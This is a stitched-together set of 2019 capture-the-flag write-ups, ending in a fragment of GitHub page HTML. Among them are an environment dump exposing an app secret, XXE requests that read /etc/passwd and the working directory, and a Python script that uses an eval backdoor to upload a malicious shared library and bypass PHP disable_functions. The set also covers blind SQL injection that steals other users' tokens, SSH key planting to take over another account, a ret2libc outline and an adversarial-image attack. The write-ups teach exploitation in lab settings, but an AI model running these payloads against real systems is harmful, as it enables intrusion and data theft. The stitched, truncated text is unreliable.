``` object(Symfony\Component\HttpFoundation\ServerBag)#10 (1) { ["parameters":protected]=> array(42) { ["USER"]=> string(8) "www-data" ["HOME"]=> string(8) "/var/www" ["HTTP_UPGRADE_INSECURE_REQUESTS"]=> string(1) "1" ["HTTP_ACCEPT_ENCODING"]=> string(13) "gzip, deflate" ["HTTP_ACCEPT_LANGUAGE"]=> string(35) "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3" ["HTTP_ACCEPT"]=> string(74) "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" ["HTTP_USER_AGENT"]=> string(78) "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" ["HTTP_CONNECTION"]=> string(5) "close" ["HTTP_HOST"]=> string(14) "127.0.0.1:8081" ["HTTP_X_FORWARDED_FOR"]=> string(12) "x.x.x.x" ["HTTP_X_FORWARDED_PROTO"]=> string(5) "https" ["HTTP_X_FORWARDED_HOST"]=> string(22) "web1.ctfsecurinets.com" ["HTTP_TRUSTED_PROXIES"]=> string(13) "172.17.0.0/16" ["SCRIPT_FILENAME"]=> string(51) "/var/www/html/epreuve/symfony_task/public/index.php" ["REDIRECT_STATUS"]=> string(3) "200" ["SERVER_NAME"]=> string(1) "_" ["SERVER_PORT"]=> string(2) "80" ["SERVER_ADDR"]=> string(10) "172.17.0.3" ["REMOTE_PORT"]=> string(5) "57272" ["REMOTE_ADDR"]=> string(10) "172.17.0.1" ["SERVER_SOFTWARE"]=> string(12) "nginx/1.10.3" ["GATEWAY_INTERFACE"]=> string(7) "CGI/1.1" ["REQUEST_SCHEME"]=> string(4) "http" ["SERVER_PROTOCOL"]=> string(8) "HTTP/1.0" ["DOCUMENT_ROOT"]=> string(41) "/var/www/html/epreuve/symfony_task/public" ["DOCUMENT_URI"]=> string(10) "/index.php" ["REQUEST_URI"]=> string(97) "/default?formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK" ["SCRIPT_NAME"]=> string(10) "/index.php" ["CONTENT_LENGTH"]=> string(0) "" ["CONTENT_TYPE"]=> string(0) "" ["REQUEST_METHOD"]=> string(3) "GET" ["QUERY_STRING"]=> string(88) "formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK" ["FCGI_ROLE"]=> string(9) "RESPONDER" ["PHP_SELF"]=> string(10) "/index.php" ["REQUEST_TIME_FLOAT"]=> float(1553422185.0433) ["REQUEST_TIME"]=> int(1553422185) ["APP_ENV"]=> string(4) "prod" ["APP_SECRET"]=> string(32) "44705a2f4fc85d70df5403ac8c7649fd" ["FLAG"]=> string(47) "Securinets{T00_Ea5y_T0_U5e_This_Local_variable}" ["MAILER_URL"]=> string(16) "null://localhost" ["SYMFONY_DOTENV_VARS"]=> string(34) "APP_ENV,APP_SECRET,FLAG,MAILER_URL" ["APP_DEBUG"]=> string(1) "0" } }```
The flag is the following.
```Securinets{T00_Ea5y_T0_U5e_This_Local_variable}``` |
# Securinets Prequals CTF 2019 – Feedback
* **Category:** Web* **Points:** 731
## Challenge
> I created this website to get your feedback on our CTF.>> Can you check if it's secure ?>> https://web2.ctfsecurinets.com/>> Author:Tr'GFx
## Solution
The website contains a feedback form. Analyzing the source code, you will discover that feedback is sent via XML messages composed by JavaScript.
```javascript<script type="text/javascript">function func(){ var xml = '' + '' + '<feedback>' + '<author>' + $('input[name="name"]').val() + '</author>' + '<email>' + $('input[name="email"]').val() + '</email>' + '<content>' + $('input[name="feedback"]').val() + '</content>' + '</feedback>'; var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ console.log(xmlhttp.readyState); console.log(xmlhttp.responseText); document.getElementById('Message').innerHTML = xmlhttp.responseText; } } xmlhttp.open("POST","feed.php",true); xmlhttp.send(xml);};</script>```
The server answers with a thanks message, inserting the author of the feedback in it.
The application is vulnerable to XXE and the `author` field can be used to return the output of the attack.
```POST /feed.php HTTP/1.1Host: web2.ctfsecurinets.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0Accept: */*Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://web2.ctfsecurinets.com/Content-Type: text/plain;charset=UTF-8Content-Length: 206Connection: close
]><feedback><author>&xx;;</author><email>lol</email><content>undefined</content></feedback>
HTTP/1.1 200 OKServer: nginx/1.10.3 (Ubuntu)Date: Sat, 23 Mar 2019 18:49:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeContent-Length: 1114
<h4>Thanks For you Feedback root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/bin/falsemysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/falsesimple_user:x:1000:1000::/home/simple_user:/bin/bashDebian-exim:x:102:102::/var/spool/exim4:/bin/false</h4>```
The remote code execution can't be performed.
So, you have to find the current working directory in order to find the flag file. You can abuse `/proc/self/` directory that contains the reference to current working directory: `cwd/`.
Hence the malicious payload is the following.
```POST /feed.php HTTP/1.1Host: web2.ctfsecurinets.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0Accept: */*Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://web2.ctfsecurinets.com/Content-Type: text/plain;charset=UTF-8Content-Length: 214Connection: close
]><feedback><author>&xx;;</author><email>lol</email><content>undefined</content></feedback>
HTTP/1.1 200 OKServer: nginx/1.10.3 (Ubuntu)Date: Sat, 23 Mar 2019 21:27:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeContent-Length: 67
<h4>Thanks For you Feedback Securinets{Xxe_xXE_@Ll_Th3_W@Y}</h4>```
So the flag is the following.
```Securinets{Xxe_xXE_@Ll_Th3_W@Y}``` |
# Raretowin
__PROBLEM__
We are given a zip file that contains memory dump and we need to find out the full path to the virus.
__SOLUTION__
This is quite confusing but __@kroz__ figure out the correct way to do it.
The rar file is infact not a rar file but a vulnerability listed by Checkpoint recently in which .ace file can masquerade as .rar.
So the first step is to rename the file `music.ace`, then `unace` software on Linux, the default doesn't work. So download [this](http://webdiis.unizar.es/pub/unix/archive/linunace25.tgz)
Then just run the unace on the music.ace file:
```./unace e music.ace
UNACE v2.5 Copyright by ACE Compression Software Jun 18 2003 22:25:55
processing archive /root/ctf/shit/music.aceWorking: Creating listfile. Please wait.Working: Reading archive. Please wait.created on 22.2.2019 with ver 2.0 by*UNREGISTERED VERSION* extracting readme.txt CRC OK extracting \..MORE FEAT SKYLAR GREY - GLORIOUS.mp3CRC-check error on MACKLEMORE FEAT SKYLAR GREY - GLORIOUS.mp3 extracting \..MORE FEAT LIL YACHTY - MARMALADE.mp3CRC-check error on MACKLEMORE FEAT LIL YACHTY - MARMALADE.mp3 extracting MACKLEMORE & RYAN LEWIS - DOWNTOWN.mp3CRC-check error on MACKLEMORE & RYAN LEWIS - DOWNTOWN.mp3 extracting \..N LEWIS - THRIFT SHOP FEAT. WANZ.mp3CRC-check error on MACKLEMORE & RYAN LEWIS - THRIFT SHOP FEAT. WANZ.mp3 extracting \.. - CANT HOLD US FEAT. RAY DALTON.mp3CRC-check error on MACKLEMORE & RYAN LEWIS - CANT HOLD US FEAT. RAY DALTON.mp3 extracting \..ORE FEAT KESHA - GOOD OLD DAYS .mp3CRC-check error on MACKLEMORE FEAT KESHA - GOOD OLD DAYS .mp3 extracting C:/Users/Public/Data/firefox.exeError: Could not create directory:C:/Users/Public/DataError: Could not create destination file: \..Data/firefox.exeDisk might be write-protected.
extracted: 7 files, totaling 42.153K bytes (compressed 42.153K)Got CRC check errors on 6 files.```As we can see it extracts music and a suspicious firefox.exe which is a dropped payload.
And the flag is `C:\\Users\\Public\\Data\\firefox.exe` (md5sum of it )
FLAG - `Securinets{9c2623856856ce8aa830a5feb0e4910d}` |
# Wallbreaker Easy
TCFT2019 Web2
```php
<html><head><style>.pre {word-break: break-all;max-width: 500px;white-space: pre-wrap;}</style></head><body>Imagick is a awesome library for hackers to break `disable_functions`.So I installed php-imagick in the server, opened a `backdoor` for you.Let's try to execute `/readflag` to get the flag.Open basedir:
Hint: eval($_POST["backdoor"]);</body>
```
Disable_functions:
```phppcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail```
We set the PATH instead of LD_PRELOAD by putenv.
We found an interesting parameter,MAGICK_CODER_MODULE_PATH , in the document, it can permits the user to arbitrarily extend the image formats supported by ImageMagick by adding loadable coder modules from an preferred location rather than copying them into the ImageMagick installation directory.
> <https://www.imagemagick.org/script/resources.php#Environment%20Variables>
PHP code is as follows
```php 378.1, "y" => 81.72 ), array( "x" => 381.1, "y" => 79.56 ), array( "x" => 384.3, "y" => 78.12 ), array( "x" => 387.6, "y" => 77.33 ), array( "x" => 391.1, "y" => 77.11 ), array( "x" => 394.6, "y" => 77.62 ), array( "x" => 397.8, "y" => 78.77 ), array( "x" => 400.9, "y" => 80.57 ), array( "x" => 403.6, "y" => 83.02 ), array( "x" => 523.9, "y" => 216.8 ), array( "x" => 526.2, "y" => 219.7 ), array( "x" => 527.6, "y" => 223 ), array( "x" => 528.4, "y" => 226.4 ), array( "x" => 528.6, "y" => 229.8 ), array( "x" => 528.0, "y" => 233.3 ), array( "x" => 526.9, "y" => 236.5 ), array( "x" => 525.1, "y" => 239.5 ), array( "x" => 522.6, "y" => 242.2 ), array( "x" => 495.9, "y" => 266.3 ), array( "x" => 493, "y" => 268.5 ), array( "x" => 489.7, "y" => 269.9 ), array( "x" => 486.4, "y" => 270.8 ), array( "x" => 482.9, "y" => 270.9 ), array( "x" => 479.5, "y" => 270.4 ), array( "x" => 476.2, "y" => 269.3 ), array( "x" => 473.2, "y" => 267.5 ), array( "x" => 470.4, "y" => 265 ), array( "x" => 350, "y" => 131.2 ), array( "x" => 347.8, "y" => 128.3 ), array( "x" => 346.4, "y" => 125.1 ), array( "x" => 345.6, "y" => 121.7 ), array( "x" => 345.4, "y" => 118.2 ), array( "x" => 346, "y" => 114.8 ), array( "x" => 347.1, "y" => 111.5 ), array( "x" => 348.9, "y" => 108.5 ), array( "x" => 351.4, "y" => 105.8 ), array( "x" => 378.1, "y" => 81.72 ), );
/* This ImagickPixel is used to set background color */$ImagickPixel->setColor( 'gray' );
/* Create new image, set color to gray and format to png*/$Imagick->newImage( 700, 500, $ImagickPixel );$Imagick->setImageFormat( 'png' );
/* Create the polygon*/$ImagickDraw->polygon( $array );
/* Render the polygon to image*/$Imagick->drawImage( $ImagickDraw );
/* Send headers and output the image */header( "Content-Type: image/{$Imagick->getImageFormat()}" );#echo $Imagick->getImageBlob( );echo "Done.\n";
?>
```
Then,we compile a png.so.
To ensure the success of php execution, I directly modify the original png.c.
```bashgcc -I ./ -shared -fPIC png.c -o png.so```
Finally, we upload all the png.la png.so exploit.php files to the website and execute them to get the flag.
EXP is as follows:
```python#!/usr/bin/env python# coding: utf-8# gcc -shared -fPIC exp.c -o png.soimport requestsimport base64
session = requests.Session()target = "http://111.186.63.208:31340/index.php"headers = {"Cache-Control":"max-age=0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36","Connection":"close","Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8","Content-Type":"application/x-www-form-urlencoded"}proxies = {"http":"http://127.0.0.1:7890"}userhash = '8f10f5b0ed8b32372911c55aa59344b4'
def exp(payload): paramsPost = {"backdoor":payload} #response = session.post(target,proxies=proxies, data=paramsPost, headers=headers) response = session.post(target, data=paramsPost, headers=headers) print("Status code: %i" % response.status_code) print("Response body: %s" % response.content)
def put_file(filename): with open(filename, "rb") as f: data = f.read().replace('{REPLACE_BASEDIR}', '/tmp/{}'.format(userhash)) content = base64.b64encode(data).decode("utf-8")
payload = 'echo file_put_contents("/tmp/{}/{}",base64_decode("{}"));'.format(userhash, filename, content) # print(payload) exp(payload)
def get_file(filename): payload = 'var_dump(file_get_contents("/tmp/{}/{}"));'.format(userhash, filename) exp(payload)
def main(): put_file('png.la') put_file('png.so') put_file('exploit.php') # get_file('exploit.php') # payload = open('exploit.php').read().replace('', '') payload = 'echo 1337;require "/tmp/{}/exploit.php";echo 1338;'.format(userhash) exp(payload) get_file('flag'.format(userhash))
if __name__ == '__main__': main()```
The attack effect is as follows:
Chinese： <http://momomoxiaoxi.com/2019/03/26/tctf2019/#wallbreaker-easy>
|
### writeup by p4w@beerPWN team
# Securinets 2019 CTF## baby_1 PWN challnge
We have a 64-bit binary and the libc of the remote server.Quickly we can notice that there is a stack buffer overflow in the main() function that read from stdin.The main problem of this pwn challenge was that the register rdx will be xored with himself at the end of the main() function as you can see from the disassembly.
Then the register will contain 0x0 when we actually get the control over rip register.We need to leak some address, and we want to do that by using the write() function, but we need some gadgets to set the registers rdi, rsi, and rdx.This because the write function expect 3 params (in 64-bit mode the arguments are passed via registers).For the first 2 params we have two good and easy gadgets that allow us to set rdi and rsi registers.
```0x00000000004006c3 # pop rdi ; ret``````0x00000000004006c1 # pop rsi ; pop r15 ; ret```
For the rdx register... well we need to use some more creative gadgets:
With this in mind we can buld the exploit that:1) leak address from GOT2) restart execution3) evaluate libc_offset4) own the executable by smash the stack and ret2libc on system()
you can check the full exploit here. |
# Beginner's Luck Writeup
## __Author:__ bytevsbyte @ beerpwn team
This was a web challenge, and we had the source files of some php pages.All begin with a request to index.php and then we are redirected tothe play.php page where we can see a token and a string that tells usthat we are not lucky and we must retry.\The index.php just generate a new token for a client, and insert it ina new row (IP, TOKEN) into users database table.So, each IP has its token associated.There is also a counter and after ten tries we must start again.\Now it's time of next file, play.php.Maybe here there is.. ohhh a SQL injection :)
The val POST variable is used in the query string as it is, BAD! (or good for us)\There isn't a direct output, so we had to go blind.But, we have a positive text in the server responseif we sent a right token (_True_) and negative otherwise(_Better luck next time !_).This is a beautiful thing.\I tested the SQL injection with:
```sql' OR token LIKE '%' -- ```
and I obtained _`True`_, so it works.\From now on I use a match with substring because I want an exact match.With _`substring(token,1,index)=part_of_token`_ or_`substring(token,index,index)=character`_ we can steal it incrementally(the part of string or character is correct if the server answer with _True_).
But now there is a big __problem__, the limited number of requests we havebefore the token must be renewed.
So, after ten tries we have to restart and the token is regenerated,and all our efforts are gone!\But, we have complete control of the query,and we can add to the injection the matchinga different IP, so we can steal the token of someone else.\The SQL injection became something like:
```sql' OR ip='x.x.x.x' AND substring(token,1,index)=xxxx -- ```
I used the beerpwn server to make the first request to the challenge with curl.After the creation of the row in the db I use my pc at hometo steal the token of the server. \The limitation of ten requests remains but now it's not a problem because,the token renewed is of the pc at home not the server and after therequest index.php I can continue with other 10 requests, and so on.\You can find the script in python that I created [HERE](./exploit.py).
At the end, I submitted the flag from the server,due to the check on the IP.
 |
# I'll not let you get
[Русская версия](./README_ru.md)
## Problem
[bird](./src/bird.png)
## Solution
So we have the file wich looks like png, but it won't open. Opening it with 010Editor:
Aha, gimp. Okay, let's open it with Gimp:
Hey, and here's the bird! But we are more interested in something under the bird. Here we see some text:
I can't see anything here, but I can copy this text to the .txt file.
Okay, first, we see that it's some hex. Moreover, it's Java .class file (CAFEBABE header). Quickly coding small script to cut first column (it contains just adresses).
```Pythonwith open("code.txt", "r") as f: text = f.readlines()
new_text = []for t in text: new_text.append("".join(t.split(" ")[1:]))code = "".join(new_text).replace("\n", "")
with open("code.class", "wb") as f: f.write(bytes.fromhex(code))```
Try to decompile this file wouldn't give us a thing:
Well, let's watch that hex again.
If you look closely, you can see that some bytes switched places with nearby byte (you can see it on the strings). Hmmm, so I need to recover it. But finding bytes, that are not on its place and move it back isn't a trivial task. After some more thinking I thought: what if it's not bytes that swapped, but it's columns of bytes. Now the problem seems easier.
Fine, now I need to find out what columns are swaped. That was actually easy. I just recovered strings. For example, instead of `niti` there should be `init`. So I need to swap 6 column with 7 columns and 8 with 9. Recovering other strings, I found out that we should swap all neighboring columns such as 0 with 1, 2 with 3, 4 with 5 and so on. But save the header, cause it's ok.
Here's a full script:
```Pythonfrom textwrap import wrap
def swap(l, first, second): for i in range(len(l)): if len(l[i]) == 6 and max(first, second) > 5: continue temp = l[i][first] l[i][first] = l[i][second] l[i][second] = temp return l
with open("code.txt", "r") as f: text = f.readlines()
new_text = []for t in text: new_text.append("".join(t.split(" ")[1:]))
lines = []for line in new_text: lines.append(wrap((line).replace("\n", ""), 2))
new_lines = swap(lines, 0, 1)new_lines = swap(new_lines, 2, 3)new_lines = swap(new_lines, 4, 5)new_lines = swap(new_lines, 6, 7)new_lines = swap(new_lines, 8, 9)new_lines = swap(new_lines, 10, 11)new_lines = swap(new_lines, 12, 13)new_lines = swap(new_lines, 14, 15)
new_lines[0][0] = 'ca'new_lines[0][1] = 'fe'new_lines[0][2] = 'ba'new_lines[0][3] = 'be'
hex_code = "".join(["".join(i) for i in new_lines])
with open("new_class.class", "wb") as f: f.write(bytes.fromhex(hex_code))
```
At the and we have following hex:
Decompile it:
Here, just run this code to get the flag.
`b00t2root{893116}` |
Neuron Break============
Category: Misc
Points: 215
Solves: 41
Task----
We are given a web server with its source code.
After analyzing the code in the ```app.py``` file we can see that we can upload a zip file containing 8 pictures labeled as ```0.jpg```, ```1.jpg```, ..., ```7.jpg```. Each of these pictures must contain a slighly modified version of the corresponding image displayed on the website (the images can be found in static folder after downloading web server source). If we manage to send pictures that remain similar to the original ones, such that neither of them is being correctly recognised by the pre-trained neural network, the flag will appear on the website.
This task is very similar to the Dog or Frog task from picoCTF 2018, but due to the increased number of pictures, their much lower resolution and different function used to calculate image similarity, the "manual" method that could be used to solve the former task is no longer feasible here. Therefore our task will be to develop an automatic (or semiautomatic in my case) algorithm to solve the challenge.
Solution--------
We will start off by downloading all the libraries necessary to run samples of provided web server (which in this case are: tensorflow, keras, numpy and mathplotlib). As the website gives only a modest amount of information regarding an uploaded zip back, we would like to be able to run an image analysis locally. First of all, let's try to write a script that will run an analysis of a single file and will return the classification probabilities for every class available in our model.
The ```app.py``` script uses the following function to run the image analysis:
```pythondef predictimg(path,lenet): image = plt.imread(path) confidence = lenet.predict(image)[0] predicted_class = np.argmax(confidence) return predicted_class, class_names[predicted_class],confidence[predicted_class]```
The lenet argument is declared in the app.py file in the following manner:
```pythonfrom networks.lenet import LeNetlenet = LeNet()```
And the class_names is declared at the beginning of the same file:
```pythonclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']```
We can copy these snippets to our script, but we must modify the predictimg function slighty. Currently it finds the class with the biggest confidence due to the ```np.argmax``` function call. Therefore we can modify it to print the same information, but for every class:
```pythondef predictimg(path,lenet): image = plt.imread(path) confidence = lenet.predict(image)[0] predicted_class = np.argmax(confidence) for i in range(10): print(class_names[i], confidence[i]*100) return predicted_class, class_names[predicted_class], confidence[predicted_class]```
Now we can simply run the predictimg function and we will get the following output as a result:
This script can be found in the ```solver_getbestclass.py``` file. As we can see, the image gets recognised as an airplane with probability 56%. We can also notice that bird got the confidence equal to 39%. We will try to modify our image slightly so that the bird confidence will become greater than 50% (and therefore the image will certainly get recognised as a bird).
The idea of our attack is simple - we will load our image and repeat the following procedure until the confidence of our chosen class (in case of the first image it will be a bird) will surpass 50%:
Select random pixel and random color chanel and change it a little bit. If the bird confidence increased then leave the change and repeat the procedure. If the bird confidence decreased then discard the change and try again.
By trial and error I've found out that xoring the color value with 15 was an efficient choice for the "change it a little bit" step of our procedure. Also, tampering with the pixel values of mathplotlib image was kind of painful, as the only method I've found to do so was to convert mathplotlib image to PIL image, change it, then convert back to mathplotlib (though I believe there are more convenient methods to do this). The complete script can be found in the ```solver.py``` file.
First of all it loads the image, calculates the initial confidence of our chosen class and saves the image in ```tmp.jpg``` file:
```pythonlenet = LeNet()print(predictclass('./static/%s.jpg' % id, lenet, targetclass))img = Image.open('./static/%s.jpg' % id)imp = np.array(img)plt.imsave('./static/tmp.jpg', imp)prob = predictclass('./static/tmp.jpg', lenet, targetclass)```
We will store the best so far image in ```tmp.jpg``` and currently analysed image after random change in ```tmp2.jpg```. Next we start a while loop going until the prob value will exceed 0.5. This part makes a random change to the best so far image:
```pythonx = randint(0, 31)y = randint(0, 31)z = randint(0, 2)img = Image.open('./static/tmp.jpg')iml = img.load()if z == 0: iml[x, y] = (iml[x, y][0] ^ am, iml[x, y][1], iml[x, y][2])elif z == 1: iml[x, y] = (iml[x, y][0], iml[x, y][1] ^ am, iml[x, y][2])else: iml[x, y] = (iml[x, y][0], iml[x, y][1], iml[x, y][2] ^ am)iml = np.array(img)plt.imsave('./static/tmp2.jpg', iml)```
And this part compares the current best confidence and the confidence of the new image:
```pythonprob2 = predictclass('./static/tmp2.jpg', lenet, targetclass)if (prob2 > prob): prob = prob2 print(prob2) plt.imsave('./static/tmp.jpg', iml)```
Before we run the script we must set the id variab;e to the index of the image we want to modify and the targetclass variable to the index of the class we want our image to become (and this class number was chosen by looking at the second best class returned by the solver_getbestclass script).
Running the following script for each picture will result in our flag:
Also, there was a small technical goof related to this task - images number 2 and 3 clearly represent a cat and a bird, but the neural network recognised them as a frog and an airplane without any changes to the image :)
Therefore my solver script changed them in such a way that they actually become recognised correctly by the neural network (and therefore treated as an incorrect classification by the web server) xD |
# Fight
## Task
[ordinate.txt](./src/ordinate.txt)
## Solution
We are given the text file. Let's look inside.
Here we can see thousands of rows. Every row consists of `OpenParentheses`, `CloseParentheses`, `Comma`, `numbers from 0 up to 9 written in words`, `#` and `hex numbers`. Let's try to replace words with characters with the following script:
```Pythonwith open("ordinate.txt", 'r') as f: data = f.read()
data = data.replace("OpenParentheses", '(')data = data.replace("CloseParentheses", ')')data = data.replace("Zero", '0')data = data.replace("One", '1')data = data.replace("Two", '2')data = data.replace("Three", '3')data = data.replace("Four", '4')data = data.replace("Five", '5')data = data.replace("Six", '6')data = data.replace("Seven", '7')data = data.replace("Eight", '8')data = data.replace("Nine", '9')data = data.replace("Comma", ',')data = data.replace(')', '').replace('(', '').strip()print(data)```
And the output is:
Looks like pixels coordinates and color. I've written following script to build the image from this:
```Pythonfrom PIL import Imagefrom textwrap import wrap
with open("ordinate.txt", 'r') as f: data = f.read()
data = data.replace("OpenParentheses", '(')data = data.replace("CloseParentheses", ')')data = data.replace("Zero", '0')data = data.replace("One", '1')data = data.replace("Two", '2')data = data.replace("Three", '3')data = data.replace("Four", '4')data = data.replace("Five", '5')data = data.replace("Six", '6')data = data.replace("Seven", '7')data = data.replace("Eight", '8')data = data.replace("Nine", '9')data = data.replace("Comma", ',')data = data.replace(')', '').replace('(', '').strip()dat = [i.split(',') for i in data.split('\n')]
coordinates = [(int(dat[i][0].strip()), int(dat[i][1].strip())) for i in range(len(dat))]colors = [wrap(dat[i][2].replace('#', '').strip(), 2) for i in range(len(dat))]width = max([coordinates[i][0] for i in range(len(coordinates))])heigth = max([coordinates[i][1] for i in range(len(coordinates))])
img = Image.new('RGB', (width+1, heigth+1))pixels = img.load()
for dot, color in zip(coordinates, colors): pixels[dot[0], dot[1]] = (int(color[0], 16), int(color[1], 16), int(color[2], 16))
img.show()
```
And here is the image:
 |
Need to connect to tony user starting from steve user. Listing /home/tony with `ls -lha /home/tony` reveals the `.flag` file owned by tony.We need a way to connect to tony without password. Good thing, there's a sshd process running in the background!Let's generate a ssh key, add it to tony's authorized_keys and connect to the tony user. Then we can chmod 400 the flag file and read it.```> ssh-keygen -t rsa> mkdir -p /home/tony/.ssh> cat .ssh/id_rsa.pub > /home/tony/.ssh/authorized_keys> ssh tony@localhost> chmod 400 .flag> cat .flag``` |
# Can You Read Me
## Problem
## Solution
So we are given nothing but the server address. Let's try and connect to it
My first thought was that this is some code. But then I thought about googling the pikachu language and here it is:
So this is a programm. After googling some interpreter I found this:[pikachu-interpreter](https://github.com/joelsmithjohnson/pikachu-interpreter)
I installed it and executed the code:
Sending this to ther server and here is a round 2:
Well, that's easy one. Who doesn't know brainfuck? Executing it online:
And moving on to the last round:
Wow, that looks like some chaos. But, googling esotric programming languages gives us this:
Well, this is something similar to our string. Googling Malbolge interpreter and finding this: [Malbolge](http://malbolge.doleczek.pl)
And executing gives us flag:
 |
tl;dr1. Notice short capacity2. Find collision on 6 capacity bytes using birthday paradox3. Force rest of the state of 2 blocks to the same value
https://github.com/p4-team/ctf/tree/master/2019-03-23-0ctf-quals/crypto_keccak |
# b00t2root-19 Tony Stank Task 262 pts
## Start : First of all we login to our ssh server```exec socat tcp-connect:18.217.123.244:2604 file:`tty`,raw,echo=0```So the task is saying that we need to become tony and if we do ```cat /etc/passwd```We find that tony is an user so we enter tony's home directory and in it we find a hidden file named flag and as you see we cant neither read it or modifiy it so the only way to get it is to become tony  So we gona try to become tony without any need for password authentification So First to set up a passwordless SSH login in Linux all you need to do is to generate a public authentication key and append it to ``` .ssh/authorized_keys ``` Thats the key that i generated  and to be sure that the key is generated we check the : ``` .ssh/id_rsa.pub ```  so after we generated steve's key we need to copy it to tony's authorized_keys because we have to login to tony as steve but in tony we dont have a .ssh folder so we make it and then we create the authorized_keys file and copy the key in it 
and now we login to : ``` ssh tony@localhost ``` and here we go no need for authentication now we got a shell as tony  then we do : ``` ls -al ``` and here is the file flag now we need to only give it permissions so i just gave it 777 ``` chmod 777 .flag ``` then cat it ``` cat .flag ```  ## and there is our flag b00t2root{1_h0p3_ssh_15_th3_0nly_w4y} |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
